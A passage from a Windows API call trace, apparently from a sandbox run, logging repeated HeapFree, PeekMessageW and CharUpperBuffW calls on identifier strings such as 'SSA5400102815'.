hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.340] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0195.340] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.340] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.342] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.342] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.342] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.342] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0195.343] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.343] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.343] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.343] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.343] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0195.343] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.344] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0195.345] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.345] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.345] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.345] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.345] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0195.345] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.346] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.346] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0195.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.347] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.347] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.347] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.347] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0195.348] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34dbcd0 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x25c0000, 